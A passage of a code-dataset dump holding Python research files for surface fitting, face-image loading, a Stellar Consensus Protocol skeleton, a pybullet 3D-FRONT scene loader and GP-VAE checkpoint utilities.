modelPredictions = self.func(data, *fittedParameters)\n absError = modelPredictions - z\n\n SE = np.square(absError) # squared errors\n MSE = np.mean(SE) # mean squared errors\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\n Rsquared = 1.0 - (np.var(absError) / np.var(z))\n\n # Condition for stopping the loop\n if (RMSE == RMSE and Rsquared == Rsquared):\n loop = False\n # ploting\n # ScatterPlot(data)\n print('RMSE:', RMSE)\n print('R-squared:', Rsquared)\n self.SurfacePlot(self.func, data,fittedParameters)\n self.ContourPlot(self.func, data, fittedParameters)\n return Rsquared,RMSE,fittedParameters\n\n\nif __name__ == \"__main__\":\n # Defining Data\n x = np.array(final['X'])\n y = np.array(final['Y'])\n RR_list = list()\n\n # this loops will only 
consider the p = 50\n for i in range(2,len(final.columns),4):\n # A0 is the location of the gNodeB for the exact data\n A0 = gNodeB_Loc[int(abs(i/4)),:]\n\n print(\"\\n calculating fit for gNodeB location: {} and data: {} \".format(A0,final.columns[i]))\n\n z = np.array(final[final.columns[i]])\n data = [x, y, z]\n\n\n # defining model\n model = fit_func(final.columns[i],data,A0)\n\n # Taking the RMSE and the Rsquared\n Rsquared,RMSE,fittedParameters = model.fit_c()\n\n # saving data in the RR_list\n RR_list.append([final.columns[i],Rsquared,RMSE,fittedParameters])\n","repo_name":"alivara/curve_fitting","sub_path":"Surface Fit/surface_fit.py","file_name":"surface_fit.py","file_ext":"py","file_size_in_byte":12568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
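Note on the surface_fit.py record above: it fits a bowl-shaped surface z = alpha*(x - x0)^2 + beta*(y - y0)^2 to BLER samples with scipy's curve_fit. A minimal self-contained sketch of that fitting step follows; the synthetic data, parameter names and starting guesses are invented for illustration and are not taken from the repository. One difference worth noting: the record's func() evaluates the model on a regenerated meshgrid, whereas curve_fit compares its output against z point-by-point, so the sketch evaluates the model at the observed sample points.

# Minimal sketch: fit z = alpha*(x - x0)**2 + beta*(y - y0)**2 with curve_fit.
# All names and data here are illustrative, not from the original repo.
import numpy as np
from scipy.optimize import curve_fit

def bowl(xy, alpha, beta, x0, y0):
    x, y = xy
    return alpha * (x - x0) ** 2 + beta * (y - y0) ** 2

rng = np.random.default_rng(0)
x = rng.uniform(-5, 5, 400)
y = rng.uniform(-5, 5, 400)
z = bowl((x, y), 0.3, 0.7, 1.0, -2.0) + rng.normal(0, 0.05, x.size)

params, _ = curve_fit(bowl, (x, y), z, p0=[0.1, 0.1, 0.0, 0.0])
pred = bowl((x, y), *params)
rmse = np.sqrt(np.mean((pred - z) ** 2))      # root mean squared error of the fit
r2 = 1.0 - np.var(pred - z) / np.var(z)       # R-squared, as in the record
print(params, rmse, r2)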
+{"seq_id":"2404749716","text":"\"\"\"Functions for reading youtube face data.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport math\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\nrootDir = 'C:\\\\frame_images_DB\\\\frame_images_DB'\nIMAGE_SIZE = 160\n\ndef resize_image(image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\toutput = np.zeros([IMAGE_SIZE, IMAGE_SIZE, 3])\n\toutput[start_y : start_y + height, start_x : start_x + width, :] = np.array(image.resize((width, height), Image.BILINEAR))\n\treturn output\n\ndef make_box(x, y, size, image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tratio = 0\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\t\tratio = IMAGE_SIZE / shape[0]\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\t\tratio = IMAGE_SIZE / shape[1]\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\treturn [(x - size/2) * ratio + start_x, (x + size/2) * ratio + start_x, (y - size/2) * ratio + start_y, (y + size/2) * ratio + start_y]\n\nclass DataSet(object):\n\n\tdef __init__(self, filelist):\n\t\tfo = open(filelist, 'r')\n\t\tself._lines = fo.readlines()\n\t\tself._num_examples = len(self._lines)\n\t\tself._iter = 0\n\n\tdef _load_image(self, index):\n\t\tparts = self._lines[index].split(',')\n\t\timage = Image.open(rootDir + '\\\\' + parts[0])\n\t\tresized_image = resize_image(image).reshape([1, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\tbox = np.array(make_box(float(parts[1]), float(parts[2]), float(parts[3]), image))\n\t\timage.close()\n\t\treturn resized_image, box\n\n\tdef next_batch(self, size):\n\t\tdata = np.zeros([size, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\ttruth = np.zeros([size, 4])\n\t\tfor i in xrange(size):\n\t\t\tdata[i, :, :, :], truth[i, :] = self._load_image(self._iter)\n\t\t\tself._iter = (self._iter + 13) % self._num_examples\n\t\treturn data, truth\n\n\t@property\n\tdef num_examples(self):\n\t\treturn self._num_examples\n","repo_name":"VoidSolitary/youtube_face","sub_path":"input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5575770232","text":"class SCPNode:\n class State:\n INIT = 0\n PREPARED = 1\n COMMITTED = 2\n EXTERNALIZED = 3\n \n def __init__(self, node_id, threshold=1):\n self.node_id = node_id\n self.state = SCPNode.State.INIT\n self.ballot_protocol = None\n self.value_to_ballot = {}\n self.threshold = threshold\n self.validators = set()\n self.quorum_slices = []\n\n def add_vote(self, slot_index, value):\n if slot_index not in self.nomination_protocol_state:\n self.nomination_protocol_state[slot_index] = {'votes': set(), 'accepted': set()}\n self.nomination_protocol_state[slot_index]['votes'].add(value)\n\n def add_validator_set(self, validators):\n \"\"\"\n Add a set of validators as a quorum slice.\n\n :param validators: A list of SCPNode instances.\n \"\"\"\n if len(validators) >= self.threshold:\n self.quorum_slices.append(set(validators))\n\n def nominate(self, slot_index, value):\n self.add_vote(slot_index, value)\n message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return message\n\n def receive_message(self, message):\n if message.message_type == 'nominate':\n self.process_nomination_protocol(message)\n elif message.message_type == 'ballot':\n self.process_ballot_protocol(message)\n\n def process_nomination_protocol(self, message):\n slot_index = message.slot_index\n value = message.value\n quorum_slice = message.quorum_slice\n\n self.add_vote(slot_index, value)\n\n # Check if the value is accepted by a quorum slice\n if self.node_id in quorum_slice.validator_set and self.is_accepted_by_quorum_slice(slot_index, value, quorum_slice):\n self.nomination_protocol_state[slot_index]['accepted'].add(value)\n\n # Broadcast a new nomination message if the value is not already accepted by the node\n if value not in self.nomination_protocol_state[slot_index]['accepted']:\n new_message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return new_message\n\n def process_ballot_protocol(self, message):\n slot_index = message.slot_index\n ballot = message.ballot\n quorum_slice = message.quorum_slice\n ballot_state = self.ballot_protocol_state.get(slot_index)\n\n if not ballot_state:\n # Initialize the ballot state for this slot index\n self.ballot_protocol_state[slot_index] = {\n 'current_ballot': None,\n 'preparing': None,\n 'prepared': None,\n 'committing': None,\n 'committed': None,\n 'externalized': None\n }\n ballot_state = self.ballot_protocol_state[slot_index]\n\n if message.message_type == 'prepare':\n self.process_prepare(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'commit':\n self.process_commit(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'externalize':\n self.process_externalize(ballot_state, message, quorum_slice)\n\n def process_prepare(self, ballot_state, message, quorum_slice):\n # Implementation of the prepare sub-protocol\n pass\n\n def process_commit(self, ballot_state, message, quorum_slice):\n # Implementation of the commit sub-protocol\n pass\n\n def process_externalize(self, ballot_state, message, quorum_slice):\n # Implementation of the externalize sub-protocol\n pass\n\n def is_accepted_by_quorum_slice(self, slot_index, value, quorum_slice):\n count = 0\n for node in quorum_slice.validator_set:\n if node == self.node_id:\n continue\n if node.nomination_protocol_state.get(slot_index, {}).get('votes', None) and value in 
node.nomination_protocol_state[slot_index]['votes']:\n count += 1\n if count >= quorum_slice.threshold:\n return True\n return False\n\nclass QuorumSlice:\n def __init__(self, threshold, validator_set):\n self.threshold = threshold\n self.validator_set = validator_set\n\n def contains(self, node_id):\n return node_id in self.validator_set\n\n def is_quorum(self, node_set):\n count = 0\n for node in self.validator_set:\n if node.node_id in node_set:\n count += 1\n if count >= self.threshold:\n return True\n return False\n\nclass SCPMessage:\n def __init__(self, message_type, sender, slot_index, quorum_slice, value=None, ballot=None):\n self.message_type = message_type\n self.sender = sender\n self.slot_index = slot_index\n self.quorum_slice = quorum_slice\n self.value = value\n self.ballot = ballot\n\n def to_dict(self):\n message_dict = {\n 'message_type': self.message_type,\n 'sender': self.sender,\n 'slot_index': self.slot_index,\n 'quorum_slice': {\n 'threshold': self.quorum_slice.threshold,\n 'validator_set': [node.node_id for node in self.quorum_slice.validator_set]\n }\n }\n if self.value is not None:\n message_dict['value'] = self.value\n if self.ballot is not None:\n message_dict['ballot'] = {\n 'counter': self.ballot.counter,\n 'value': self.ballot.value\n }\n return message_dict\n\n @classmethod\n def from_dict(cls, message_dict, nodes):\n quorum_slice_dict = message_dict['quorum_slice']\n quorum_slice = QuorumSlice(\n threshold=quorum_slice_dict['threshold'],\n validator_set=[nodes[node_id] for node_id in quorum_slice_dict['validator_set']]\n )\n ballot_dict = message_dict.get('ballot')\n ballot = None\n if ballot_dict:\n ballot = SCPBallot(\n counter=ballot_dict['counter'],\n value=ballot_dict['value']\n )\n return cls(\n message_type=message_dict['message_type'],\n sender=message_dict['sender'],\n slot_index=message_dict['slot_index'],\n quorum_slice=quorum_slice,\n value=message_dict.get('value'),\n ballot=ballot\n )\n\nclass SCPBallot:\n def __init__(self, counter, value):\n self.counter = counter\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, SCPBallot):\n return False\n return self.counter == other.counter and self.value == other.value\n\n def __lt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n if self.counter < other.counter:\n return True\n if self.counter == other.counter:\n return self.value < other.value\n return False\n\n def __le__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self < other\n\n def __gt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return not self <= other\n\n def __ge__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self > other\n\n def __repr__(self):\n return f\"SCPBallot(counter={self.counter}, value={self.value})\"\n","repo_name":"jzhao49/BlockchainsS23FinalProject","sub_path":"scp.py","file_name":"scp.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
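Note on the scp.py record above: SCPBallot orders ballots by counter first and by value second; also note that SCPNode.__init__ never creates nomination_protocol_state or ballot_protocol_state, so add_vote would raise AttributeError as written. The snippet below restates just the ballot ordering as a standalone sketch; the class and sample values are illustrative and are not imported from the module.

# Standalone illustration of the ballot ordering defined above: ballots compare
# by counter first, then by value. Re-declared here so the snippet runs on its own.
from functools import total_ordering

@total_ordering
class Ballot:
    def __init__(self, counter, value):
        self.counter = counter
        self.value = value

    def __eq__(self, other):
        return (self.counter, self.value) == (other.counter, other.value)

    def __lt__(self, other):
        return (self.counter, self.value) < (other.counter, other.value)

    def __repr__(self):
        return f"Ballot({self.counter}, {self.value!r})"

ballots = [Ballot(2, "tx-a"), Ballot(1, "tx-z"), Ballot(2, "tx-b")]
print(sorted(ballots))  # [Ballot(1, 'tx-z'), Ballot(2, 'tx-a'), Ballot(2, 'tx-b')]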
+{"seq_id":"27256331045","text":"#!/usr/bin/env python3\n\nimport os\nimport random\nimport json\nimport numpy as np\nimport time\nimport logging\nfrom typing import List\n\nfrom pathlib import Path\nimport pybullet as pb\nfrom dataclasses import dataclass\n\nfrom imm.sim.env.env_base import EnvironmentBase\nfrom imm.sim.sim_debug_utils import debug_get_full_aabb\n\n\ndef _ceildiv(a, b):\n \"\"\" from https://stackoverflow.com/a/17511341 \"\"\"\n return -(-a // b)\n\n\ndef _split_multibody_kwargs(kwargs: dict) -> List[dict]:\n \"\"\"\n Split kwargs for createMultiBody, so that\n the number of links do not exceed the hardcoded #128 limit.\n\n NOTE(ycho): This is a hack - consider alternative solutions.\n \"\"\"\n\n num_links = len(kwargs['linkMasses'])\n num_bodies = _ceildiv(num_links, 128)\n\n # NOTE(ycho): Still return as a list even\n # in a trivial case.\n if num_bodies <= 1:\n return [kwargs]\n m = num_links // num_bodies\n\n out = [None for _ in range(num_bodies)]\n for i in range(num_bodies):\n # link slice range ...\n i0 = i * m\n i1 = min((i+1)*m, num_links)\n\n # Start from a copy of `kwargs`.\n out[i] = dict(kwargs)\n\n # Reset properties that should be unique to\n # a single base.\n # NOTE(ycho): This does not pedantically clear ALL properties -\n # only the ones that are known to be set at creation.\n out[i]['baseCollisionShapeIndex'] = -1\n out[i]['baseVisualShapeIndex'] = -1\n\n # Set a slice of link properties.\n for k, v in kwargs.items():\n if k.startswith('link'):\n out[i][k] = v[i0:i1]\n\n # Move base-unique properties into the first element in the split args.\n out[0]['baseCollisionShapeIndex'] = kwargs['baseCollisionShapeIndex']\n out[0]['baseVisualShapeIndex'] = kwargs['baseVisualShapeIndex']\n\n return out\n\n\ndef _load_tdf_scene(scene_file: str, model_dir: str, sim_id: int,\n use_convex_collision: bool):\n \"\"\"\n Load a 3DFRONT scene.\n \"\"\"\n model_dir = Path(model_dir)\n\n data = None\n with open(scene_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if data is None:\n return None\n\n # Build mapping from uid <-> jid\n model_uid = []\n model_jid = []\n model_map = dict()\n for f in data['furniture']:\n if 'valid' in f and f['valid']:\n model_map[f['uid']] = f['jid']\n\n # Build mapping from uid <-> mesh = { vertices, face_indices }\n mesh_map = dict()\n for m in data['mesh']:\n mesh_map[m['uid']] = (\n np.reshape(m['xyz'], (-1, 3)).astype(np.float32),\n np.reshape(m['faces'], (-1, 3))\n )\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_set = set()\n for m in data['mesh']:\n if m['type'].strip() == 'Floor':\n floor_set.add(m['uid'])\n\n # Iterate through and add shapes . . 
.\n scene = data['scene']\n room = scene['room']\n shape_map = dict()\n kwargs = {\n 'baseMass': 0, # fixed,\n 'baseCollisionShapeIndex': -1,\n 'baseVisualShapeIndex': -1,\n 'basePosition': [0, 0, 0],\n # NOTE(ycho): +Y up convention -> +Z up convention\n 'baseOrientation': pb.getQuaternionFromEuler([np.pi/2, 0, 0]),\n 'baseInertialFramePosition': [0, 0, 0],\n 'baseInertialFrameOrientation': [0, 0, 0, 1],\n\n 'linkMasses': [],\n 'linkCollisionShapeIndices': [],\n 'linkVisualShapeIndices': [],\n 'linkPositions': [],\n 'linkOrientations': [],\n 'linkInertialFramePositions': [],\n 'linkInertialFrameOrientations': [],\n 'linkParentIndices': [],\n 'linkJointTypes': [],\n 'linkJointAxis': [],\n\n 'physicsClientId': sim_id\n }\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_vertices = np.empty((0, 3), dtype=np.float32)\n floor_face_indices = np.empty((0), dtype=np.int32)\n\n for r in room:\n room_id = r['instanceid']\n children = r['children']\n for c in children:\n ref = c['ref']\n\n def _lookup_cache(ref):\n \"\"\" Lookup collision shape from cache. \"\"\"\n if ref not in shape_map:\n return -1, -1\n return shape_map[ref]\n\n def _lookup_model(ref):\n \"\"\" Lookup collision shape from 3D-FUTURE models. \"\"\"\n if ref not in model_map:\n return -1, -1\n mid = model_map[ref]\n model_file = (model_dir / mid / 'raw_model.obj')\n\n # NOTE(ycho): Temporary workaround for degenerate model?\n # if '39057a21-0a68-3494-8522-2e473dd6a38f' in str(model_file):\n # return -1, -1\n\n if not model_file.exists():\n logging.warn('No such model file : {}'.format(model_file))\n return -1, -1\n # TODO(ycho): remove this flag ... only for visualization\n # or leave it in? 
idk...\n col_id = pb.createCollisionShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n vis_id = pb.createVisualShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n return (col_id, vis_id)\n\n def _lookup_mesh(ref):\n \"\"\" Lookup collision shape from inline mesh \"\"\"\n if ref not in mesh_map:\n return -1, -1\n (vertices, face_indices) = mesh_map[ref]\n vertices = vertices.astype(np.float64).reshape(-1, 3)\n\n # FIXME(ycho): This is a hack to enable visualization\n # against pybullet issues with backface culling - i.e.\n # rendering the walls from the exterior through a window.\n face_indices = np.c_[\n face_indices,\n face_indices[..., ::-1]\n ]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=vertices,\n indices=face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n # NOTE(ycho): VisualShape is redundant for now.\n # vis_id = pb.createVisualShape(pb.GEOM_MESH,\n # vertices=vertices,\n # indices=face_indices,\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n # physicsClientId=sim_id)\n vis_id = -1\n return (col_id, vis_id)\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n if (ref in floor_set) and (ref in mesh_map):\n vertices, face_indices = mesh_map[ref]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n R = np.reshape(pb.getMatrixFromQuaternion(c['rot']), (3, 3))\n floor_face_indices = np.r_[\n floor_face_indices, face_indices + len(floor_vertices)]\n floor_vertices = np.r_[\n floor_vertices, vertices @ R.T + c['pos']]\n continue\n\n # Loop through lookup methods until shape is found.\n col_id, vis_id = -1, -1\n for method in [_lookup_cache, _lookup_model, _lookup_mesh]:\n (col_id, vis_id) = method(ref)\n if col_id >= 0:\n break\n\n # Abort this entry if shape not found.\n if col_id < 0:\n continue\n\n # Cache any newly created shapes.\n if ref not in shape_map:\n shape_map[ref] = (col_id, vis_id)\n\n # NOTE(ycho):mass==0 indicates fixed body.\n kwargs['linkMasses'].append(0)\n kwargs['linkCollisionShapeIndices'].append(col_id)\n kwargs['linkVisualShapeIndices'].append(vis_id)\n kwargs['linkPositions'].append(c['pos'])\n kwargs['linkOrientations'].append(c['rot'])\n kwargs['linkInertialFramePositions'].append([0, 0, 0])\n kwargs['linkInertialFrameOrientations'].append([0, 0, 0, 1])\n kwargs['linkParentIndices'].append(0)\n kwargs['linkJointTypes'].append(pb.JOINT_FIXED)\n kwargs['linkJointAxis'].append([0, 0, 0])\n\n logging.info('# links = {}'.format(len(kwargs['linkMasses'])))\n\n # NOTE(ycho): Add special handling for floors.\n # NOTE(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=floor_vertices,\n indices=floor_face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n kwargs['baseCollisionShapeIndex'] = floor_col_id\n\n # NOTE(ycho): pybullet does not expose MAX_DEGREE_OF_FREEDOM\n # limit on the maximum number of links possible on the multibody,\n # so we duplicate the hardcoded constant here.\n kwargss = _split_multibody_kwargs(kwargs)\n # kwargss = [kwargss[1]]\n body_ids = [pb.createMultiBody(**kwargs) for kwargs in kwargss]\n print('body_ids = {}'.format(body_ids))\n\n for 
body_id in body_ids:\n # Finally, add texture information to the visual shapes.\n # NOTE(ycho): Texture can only be added in the post-processing step\n # through pb.changeVisualShape().\n tex_map = {}\n vis_data = pb.getVisualShapeData(body_id, physicsClientId=sim_id)\n for i, v in enumerate(vis_data):\n # Lookup mesh file.\n mesh_file = v[4].decode('utf-8')\n if not mesh_file:\n continue\n\n # Find texture file based on mesh file path.\n # NOTE(ycho): Relies on the dataset structure of 3DFRONT.\n texture_file = Path(mesh_file).parent / 'texture.png'\n if not texture_file.exists():\n logging.error(\n 'Texture file : {} does not exist!'.format(texture_file))\n continue\n\n # Deal with texture id caching logic ...\n tex_id = -1\n if texture_file not in tex_map:\n tex_map[texture_file] = pb.loadTexture(\n str(texture_file), physicsClientId=sim_id)\n tex_id = tex_map[texture_file]\n\n # Finally, add texture information to the link.\n pb.changeVisualShape(body_id, i,\n textureUniqueId=tex_id,\n physicsClientId=sim_id)\n return body_ids\n\n\n@dataclass\nclass ThreeDFrontEnvironmentSettings:\n model_dir: str\n scene_file: str = ''\n scene_dir: str = ''\n use_convex_collision: bool = True\n\n use_fast_aabb_in_placement: bool = True\n max_placement_iter: int = 256\n\n\nclass ThreeDFrontEnvironment(EnvironmentBase):\n def __init__(self, settings: ThreeDFrontEnvironmentSettings):\n self.settings_ = settings\n self.env_ids_ = []\n self.sim_id_ = -1\n\n @property\n def sim_id(self):\n return self.sim_id_\n\n def reset(self, sim_id: int):\n self.sim_id_ = sim_id\n\n # Fetch or lookup scene file to instantiate.\n scene_file = ''\n if self.settings_.scene_file:\n scene_file = self.settings_.scene_file\n else:\n if self.settings_.scene_dir:\n # convenient shorthand.\n d = self.settings_.scene_dir\n scene_file = Path(d)/random.choice(os.listdir(d))\n scene_file = Path(scene_file)\n logging.info('Loading scene file = {}'.format(scene_file))\n if not scene_file.is_file():\n logging.error('Scene file : {} does not exist!'.format(scene_file))\n return\n\n # Load the scene.\n self.env_ids_ = _load_tdf_scene(str(scene_file),\n self.settings_.model_dir, sim_id,\n self.settings_.use_convex_collision)\n\n def place(self, robot_id: int):\n # TODO(ycho): Consider exposing this parameter.\n EPS = 1e-3\n\n robot_pose = pb.getBasePositionAndOrientation(robot_id,\n physicsClientId=self.sim_id)\n old_pos = robot_pose[0]\n old_rot = robot_pose[1]\n old_z = old_pos[2]\n\n floor_aabb = np.asarray(pb.getAABB(\n self.env_ids_[0], -1, physicsClientId=self.sim_id), dtype=np.float32)\n robot_aabb = debug_get_full_aabb(self.sim_id, robot_id)\n robot_size = robot_aabb[1] - robot_aabb[0]\n\n # NOTE(ycho): Shrink the sampled space by the robot radius.\n pos_min = floor_aabb[0, :2] + 0.5 * robot_size[:2]\n pos_max = floor_aabb[1, :2] - 0.5 * robot_size[:2]\n\n for i in range(self.settings_.max_placement_iter):\n logging.debug('Placement {}/{}'.format(i,\n self.settings_.max_placement_iter))\n # Sample X-Y position from floor AABB.\n x, y = np.random.uniform(pos_min, pos_max)\n\n # Cast ray from robot top -> floor.\n ray_src = [x, y, floor_aabb[1, 2] +\n robot_aabb[1, 2] - robot_aabb[0, 2]]\n ray_dst = [x, y, floor_aabb[0, 2] - EPS]\n ray_res = pb.rayTest(ray_src, ray_dst, physicsClientId=self.sim_id)\n\n # If by some magic, multiple intersections happened,\n # ignore this case.\n if len(ray_res) != 1:\n continue\n ray_res = ray_res[0]\n\n # The ray must hit env + floor.\n if (ray_res[0] != self.env_ids_[0]) or (ray_res[1] != -1):\n 
continue\n\n # Complete the desired new position.\n # new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_z = floor_aabb[1, 2] + (old_z - robot_aabb[0, 2])\n new_pos = np.asarray([x, y, new_z + EPS], dtype=np.float32)\n new_rot = old_rot\n # NOTE(ycho): Alternatively, sample from a random SE2 orientation:\n # new_rot = pb.getQuaternionFromEuler([0.0, 0.0, np.random.uniform(-np.pi, np.pi)])\n\n # Reject the new position if it collides with existing objects.\n if self.settings_.use_fast_aabb_in_placement:\n # NOTE(ycho): This query is conservative, so the returned objects\n # may not actually overlap with the robot. However,\n # perhaps if the object is close enough to the robot that we should\n new_aabb = robot_aabb + new_pos - old_pos\n o = pb.getOverlappingObjects(new_aabb[0], new_aabb[1],\n physicsClientId=self.sim_id)\n if o is not None:\n continue\n\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n break\n else:\n # Actually place the robot where it would go,\n # and then check if it results in a collision.\n # Try placing the robot here now ...\n # NOTE(ycho): Since pybullet uses a default collision margin (0.04 I think?),\n # even this may be a little bit more conservative than the actual collision.\n pb.resetBasePositionAndOrientation(robot_id,\n new_pos,\n new_rot,\n physicsClientId=self.sim_id)\n col = False\n for env_id in self.env_ids_:\n cpts = pb.getClosestPoints(env_id, robot_id,\n np.inf,\n physicsClientId=self.sim_id)\n for cpt in cpts:\n if cpt[8] < 0:\n col = True\n break\n # Early exit if collision found\n if col:\n break\n # Continue searching if collision found\n if col:\n continue\n\n # All is well! break.\n break\n","repo_name":"iMSquared/imm_sim","sub_path":"src/imm/sim/env/three_d_front_env.py","file_name":"three_d_front_env.py","file_ext":"py","file_size_in_byte":17389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
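Note on the three_d_front_env.py record above: _split_multibody_kwargs works around pybullet's hard-coded limit of 128 links per multibody by slicing every 'link*' array into chunks and keeping the base shape only on the first chunk. A dependency-free sketch of that chunking idea follows; the field names mirror the record, the demo values are invented, and the per-chunk size is rounded up here so no trailing links are dropped.

# Dependency-free sketch of the link-splitting idea above.
MAX_LINKS = 128

def ceildiv(a, b):
    return -(-a // b)

def split_kwargs(kwargs, max_links=MAX_LINKS):
    n = len(kwargs['linkMasses'])
    n_bodies = ceildiv(n, max_links)
    if n_bodies <= 1:
        return [kwargs]
    m = ceildiv(n, n_bodies)  # links per chunk, rounded up so nothing is lost
    out = []
    for i in range(n_bodies):
        chunk = dict(kwargs)
        chunk['baseCollisionShapeIndex'] = -1  # base shape belongs to chunk 0 only
        for k, v in kwargs.items():
            if k.startswith('link'):
                chunk[k] = v[i * m:(i + 1) * m]
        out.append(chunk)
    out[0]['baseCollisionShapeIndex'] = kwargs['baseCollisionShapeIndex']
    return out

demo = {'baseCollisionShapeIndex': 7,
        'linkMasses': [0] * 300,
        'linkParentIndices': list(range(300))}
parts = split_kwargs(demo)
print([len(p['linkMasses']) for p in parts])  # [100, 100, 100]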
+{"seq_id":"32040966699","text":"import tensorflow as tf\r\nimport tensorflow_probability as tfp\r\nfrom tensorflow.python.ops import math_ops as tfmath_ops\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom datetime import datetime as dt\r\nimport glob\r\nfrom matplotlib.patches import Ellipse\r\nimport shutil\r\nimport pandas as pd\r\nimport pickle\r\nimport time\r\nimport subprocess as sp\r\nimport math\r\n\r\n\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\nfrom scipy import ndimage\r\nimport scipy\r\nimport seaborn as sns\r\n\r\ntfk = tfp.math.psd_kernels\r\n\r\n\r\ndef make_checkpoint_folder(base_dir, expid=None, extra=\"\"):\r\n \"\"\"\r\n Makes a folder and sub folders for pics and results\r\n Args:\r\n base_dir: the root directory where new folder will be made\r\n expid: optional extra sub dir inside base_dir\r\n \"\"\"\r\n\r\n # make a \"root\" dir to store all checkpoints\r\n # homedir = os.getenv(\"HOME\")\r\n # base_dir = homedir+\"/GPVAE_checkpoints/\"\r\n\r\n if expid is not None:\r\n base_dir = base_dir + \"/\" + expid + \"/\"\r\n\r\n if not os.path.exists(base_dir):\r\n os.makedirs(base_dir)\r\n \r\n # now make a unique folder inside the root for this experiments\r\n filenum = str(len(os.listdir(base_dir))) + \"_\"+extra+\"__on__\"\r\n\r\n T = dt.now()\r\n\r\n filetime = str(T.day)+\"_\"+str(T.month)+\"_\"+str(T.year) + \"__at__\"\r\n filetime += str(T.hour)+\"_\"+str(T.minute)+\"_\"+str(T.second)\r\n\r\n # main folder\r\n checkpoint_folder = base_dir + filenum + filetime\r\n os.makedirs(checkpoint_folder)\r\n\r\n # pictures folder\r\n pic_folder = checkpoint_folder + \"/pics/\"\r\n os.makedirs(pic_folder)\r\n\r\n # pickled results files\r\n res_folder = checkpoint_folder + \"/res/\"\r\n os.makedirs(res_folder)\r\n\r\n # source code\r\n src_folder = checkpoint_folder + \"/sourcecode/\"\r\n os.makedirs(src_folder)\r\n old_src_dir = os.path.dirname(os.path.abspath(__file__)) + \"/\"\r\n src_files = os.listdir(old_src_dir)\r\n print(\"\\n\\nCopying source Code to \"+src_folder)\r\n for f in src_files:\r\n if \".py\" in f:\r\n src_file = old_src_dir + f\r\n shutil.copy2(src_file, src_folder)\r\n print(src_file)\r\n print(\"\\n\")\r\n\r\n # predictions folder, for plotting purposes\r\n preds_folder = checkpoint_folder + \"/preds/\"\r\n os.makedirs(preds_folder)\r\n\r\n \r\n return checkpoint_folder + \"/\"\r\n\r\n\r\nclass pandas_res_saver:\r\n \"\"\"\r\n Takes a file and a list of col names to initialise a\r\n pandas array. 
